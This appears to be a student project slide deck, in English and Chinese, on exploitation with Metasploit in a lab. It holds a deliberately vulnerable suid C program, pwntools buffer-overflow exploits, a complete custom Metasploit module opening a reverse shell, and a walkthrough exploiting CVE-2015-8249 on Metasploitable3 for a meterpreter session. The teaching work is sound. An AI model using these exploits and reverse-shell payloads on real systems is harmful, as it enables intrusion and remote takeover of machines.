Deeply Studying Metasploit framework === --- # Metasploit framework <div class=members> 第一組</br> 1. B043040006 謝文仁 </br> 2. B043040020 張哲魁 </br> 3. B043040036 滕熙評 </br> 4. B043040043 朱晉廷 </br> 指導教授： 王智弘 </div> --- # Agenda - Write your own metasploit module - Attack Metasploitable 3 - Windows Server 2008 - Backdoor on Android using metasploit --- # Write your own metasploit module --- # Abstract 把撰寫好的 payload，整合進 metasploit framework。 以 buffer overflow 為例，將自己寫的漏洞放入 victim，寫好 payload，並整合到 metasploit 裡。 --- # Environment and tools - Attacker: 1. OS: mac osx 10.13.6 2. Metasploit: 5.0.25 - Victim: 1. OS: Ubuntu 14.04 2. gcc: 4.8.4 - Network: - In the same subnet. --- # Vulnerable Program A buffer overflow program with TCP socket connection. ```c=1 char sp[1024]; ``` ```c=48 /* start vulnerable read, ret2shellcode */ printf("shellcode:"); read(cli_fd, sp, 1024); printf("The shellcode recv is:%s\n", sp); printf("overflow here:"); char buf[20]; // VULNERABLE PLACE!! Didn't restrict the range read(cli_fd, buf, 0xffffffff); /* ----- */ printf("the buf recv is:%s\n", buf); /* end of vulnerable read */ ``` ---- ## Disabled Protections <p style="color:red"; align="center";> Set suid to get root premission. </p> Compile with these flags. ```Makefile= SRC=vuln.c EXEC=vuln CC=gcc CCFLAG=-g -m32 -fno-stack-protector -z execstack -o all: ${CC} ${CCFLAG} ${EXEC} ${SRC} sudo chown root ${EXEC} sudo chgrp root ${EXEC} sudo chmod +s ${EXEC} clean: rm -f ${EXEC} ``` ---- ## Final Protections <img src="https://i.imgur.com/FgWy3MN.png" align="center"> ---- ## Payload - 1 Return to char sp[1024] address (0x0804a080), where the place we inserted the shellcode. Ruby version: ```ruby= require 'pwn' context.arch = 'i386' z = Sock.new '192.168.56.101', ARGV[0] shellcode = "\x6a\x66\x58\x6a\x01\x5b\x31\xf6 ... " z.sendline buf address = 0x0804a080 # return address payload = "a"*80 + p32(address) z.write payload z.interact ``` ---- ## Payload - 2 Python version: ```python= from pwn import * import sys host, port = '192.168.56.101', int(sys.argv[1]) r = remote(host, port) # shellcode from package - pwn r.sendline(asm(shellcraft.sh())) address = 0x0804a080 # return address payload = "a"*80 + p32(address) r.sendline(payload) r.interactive() ``` --- # Exploit Result - victim Shellcode: Reverse TCP at port 1337 Victim, bind at port 8888, will open a backdoor on port 1337   ---- ## Exploit Result - attacker Attacker, connect success at port 1337 (victim ip=192.168.56.101)   --- # Integrate to Metasploit - Start to wirte my own metasploit module! - Official Template: [Metasploit Github](https://github.com/rapid7/metasploit-framework/wiki/How-to-get-started-with-writing-an-exploit) - 基本上照著那個 template 寫就可以了 ---- ## Module functions 1 - 有幾個重點 function: - `initialize()`: Where metadata placed. - 可以根據不同的平台去設定 payload，return address 等等。 - 其他相關的資訊都會放在這 (ex: License, Name, ...) ---- ## Module functions 2 - `exploit()`: Main function of exploit. 1. connect 2. send payload 3. handler 4. disconnect ---- ## Whole Module ```ruby= ## # This module requires Metasploit ## require 'msf/core' class MetasploitModule < Msf::Exploit::Remote Rank = ManualRanking include Msf::Exploit::Remote::Tcp def initialize(info = {}) super(update_info(info, 'Name' => 'hacker class ret2shellcode buffer overflow', 'Description' => %q| This is a module for buffer overflow of a simple program vuln, only works on this binary, create for hacker class final project. |, 'Author' => 'haruna', 'References' => [ [ 'URL', 'https://github.com/scwuaptx/HITCON-Training' ], ], 'Platform' => 'linux', 'Payload' => { }, 'Arch' => [ARCH_X86], 'Targets' => [ [ 'Linux x86', { 'Arch' => ARCH_X86, 'Ret' => 0x0804a080 } ] ], 'DefaultTarget' => 0 )) end # Returns that the remote host is always vulnerable def check return Exploit::CheckCode::Vulnerable end def exploit connect print_status("Sending #{payload.encoded.length} byte payload...") # send shellcode print_status("Sending payload...:" + payload.encoded) p = payload.encoded sock.put(p) # Build the buffer for transmission, return to the shellcode place. buf = "A" * 80 # offset = 80 bytes buf += [ target.ret ].pack('V') # pack('V'), means 32-bit little endian print_status("Sending:" + buf) sock.put(buf) handler disconnect end end ``` --- # Metasploit Result - victim Victim still bind at port 8888 ...  ---- ## Metasploit Result - attacker 1 Enter msfconsole and initialize settings ... My module is placed at `exploit/unix/bof1` | who? | IP | PORT | metasploit | | ---- | -- | ---- | ------------- | | Attacker | 192.168.56.1 | 12345 | LHOST / LPORT | | Victim | 192.168.56.101 | 8888 | RHOST / RPORT | ---- ## Metasploit Result - attacker 2 After setting ... ``` msf5 exploit(unix/bof1) > show info Name: hacker class ret2shellcode buffer overflow Module: exploit/unix/bof1 Platform: Linux Arch: x86 Privileged: No License: Metasploit Framework License (BSD) Rank: Manual Provided by: haruna Available targets: Id Name -- ---- 0 Linux x86 Check supported: Yes Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTS 192.168.56.101 yes The target address range or CIDR identifier RPORT 8888 yes The target port (TCP) Payload information: Description: This is a module for buffer overflow of a simple program vuln, only works on this binary, create for hacker class final project. References: https://github.com/scwuaptx/HITCON-Training ``` ---- ## Metasploit Result - attacker 3 Next, set payload ... 我們可以直接用 metasploit 裡面的 payload 產生 shellcode，不用像自己寫 exploit 要自己上網找或是用其他工具生成。(其實也可以用 `msfvenom`) ---- ## Metasploit Result - attacker 4 ```shell= set payload linux/x86/shell/reverse_tcp ``` ``` msf5 exploit(unix/bof1) > set payload linux/x86/shell/reverse_tcp payload => linux/x86/shell/reverse_tcp msf5 exploit(unix/bof1) > show options Module options (exploit/unix/bof1): Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTS 192.168.56.101 yes The target address range or CIDR identifier RPORT 8888 yes The target port (TCP) Payload options (linux/x86/shell/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- LHOST 192.168.56.1 yes The listen address (an interface may be specified) LPORT 12345 yes The listen port Exploit target: Id Name -- ---- 0 Linux x86 ``` ---- ## Metasploit Result - attacker 4 Finally, exploit!  --- # DEMO --- # Refernece 1. [HITCON Training](https://github.com/scwuaptx/HITCON-Training) 2. [Module Example](https://taishi8117.github.io/2016/07/24/bof-metasploit/) 3. [Shell codes](http://shell-storm.org/shellcode/) 4. [Metasploit Github Wiki](https://github.com/rapid7/metasploit-framework/wiki) --- # Metasploitable3 - windows server 2008 --- # Abstract Exploit on Metasploitale3 - Microsoft Windows Server 2008 Github Page: [Metasploitable 3](https://github.com/rapid7/metasploitable3) --- # Metasploitable 3 一個 VM，提供了 ubuntu 14.04 和 windows server 2008 兩種，可以自行選擇要 build 哪個。 上面留有一些漏洞可供攻擊。 --- # Scan Vulnerablilities Use `nmap`, flags: probe **ALL** ports to determine service info ``` $ nmap -sV -p- 192.168.56.103 Starting Nmap 7.70 ( https://nmap.org ) at 2019-06-13 00:01 CST Nmap scan report for 192.168.56.103 Host is up (0.0033s latency). Not shown: 65516 filtered ports PORT STATE SERVICE VERSION 21/tcp open ftp Microsoft ftpd 22/tcp open ssh OpenSSH 7.1 (protocol 2.0) 80/tcp open http Microsoft IIS httpd 7.5 1617/tcp open rmiregistry Java RMI 4848/tcp open ssl/http Oracle GlassFish 4.0 (Servlet 3.1; JSP 2.3; Java 1.8) 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) 8020/tcp open http Apache httpd 8022/tcp open http Apache Tomcat/Coyote JSP engine 1.1 8027/tcp open unknown 8080/tcp open http Oracle GlassFish 4.0 (Servlet 3.1; JSP 2.3; Java 1.8) 8282/tcp open http Apache Tomcat/Coyote JSP engine 1.1 8383/tcp open ssl/http Apache httpd 8484/tcp open http Jetty winstone-2.8 8585/tcp open http Apache httpd 2.2.21 ((Win64) PHP/5.3.10 DAV/2) 9200/tcp open http Elasticsearch REST API 1.1.1 (name: Eric Williams; Lucene 4.7) 49153/tcp open msrpc Microsoft Windows RPC 49154/tcp open msrpc Microsoft Windows RPC 49179/tcp open rmiregistry Java RMI 49205/tcp open tcpwrapped Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 268.44 seconds ``` ---- ## Vulnerabilities 1 We can see a lot of http port is opened. Try port 8020, a http service. <img src="https://i.imgur.com/G6dgyI6.png" width=70% height=70%> ---- ## Vulnerablilities 2 - There's a "ManageEngine Desktop Central" version 9 on it. - 一個提供遠端 Windows 桌面管理的工具 - Search whether this version is vulernable or not. ---- ## Vulnerablilities 3 - Lucky! Got a CVE-2015-8249, [Reference at NIST PAGE](https://nvd.nist.gov/vuln/detail/CVE-2015-8249) - 這個漏洞出在該軟體第九版中的一個 class `FileUploadServlet` 中的一個 parameter `computerName`，並沒有對他做完整的檢查，造成 path injection attack，Attacker 可以遠端執行代碼。 ---- ## Vulnerabilities 4 - 下面這個是 Rapid 7 的 Blog，有詳細的 payload write-up。 [Blog](https://blog.rapid7.com/2015/12/14/r7-2015-22-manageengine-desktop-central-9-fileuploadservlet-connectionid-vulnerability-cve-2015-8249/) - Metasploit 裡就有此漏洞的 module 了。 - exploit/windows/http/manageengine_connectionid_write --- # Exploit on Metasploit 1 parameter config: ```shell= use exploit/windows/http/manageengine_connectionid_write set payload windows/meterpreter/reverse_tcp set RHOST 192.168.56.103 RPORT 8020 set LHOST 192.168.56.1 LPORT 4444 ``` ---- ## Exploit on Metasploit 2 完整設定： <img src="https://i.imgur.com/guRwESK.png" width=90% height=90%> ---- ## Exploit on Metasploit 3 Exploit! 成功拿到 meterpreter shell。  --- # Protections 升級版本 or 上 patch 以上的 exploit 在 version 9, build 91093 後就無效了 而裝新版本的話，目前的最新版是第十版 --- # DEMO <style> .reveal h1{ text-align: center; font-size: 75px; margin:auto; } .reveal h2{ font-size: 70px; } .reveal .members{ text-align: center; } .reveal p{ text-align: justify; } .markdown-body h1{ text-align: center;} .markdown-body h2{ text-align: left;} </style>